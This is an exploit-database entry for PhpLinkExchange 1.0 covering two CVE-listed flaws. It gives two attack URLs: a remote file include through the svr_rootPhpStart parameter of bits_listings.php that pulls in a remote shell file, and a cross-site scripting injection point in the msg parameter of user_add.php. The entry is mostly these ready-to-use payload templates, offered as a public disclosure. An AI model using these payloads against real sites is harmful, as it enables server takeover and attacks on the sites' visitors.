PhpLinkExchange 1.0 - Include / Cross-Site Scripting
Author: s3rv3r_hack3r
type: webapps
platform: php
port:
date_added: 2006-09-10
date_updated:
verified: 1
codes: OSVDB-32157;CVE-2006-4742;OSVDB-32156;CVE-2006-4741
tags:
aliases:
screenshot_url:
application_url:
vendor :www.idevspot.com
Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
remote file include :
http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]
xss:
http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]
# milw0rm.com [2006-09-11]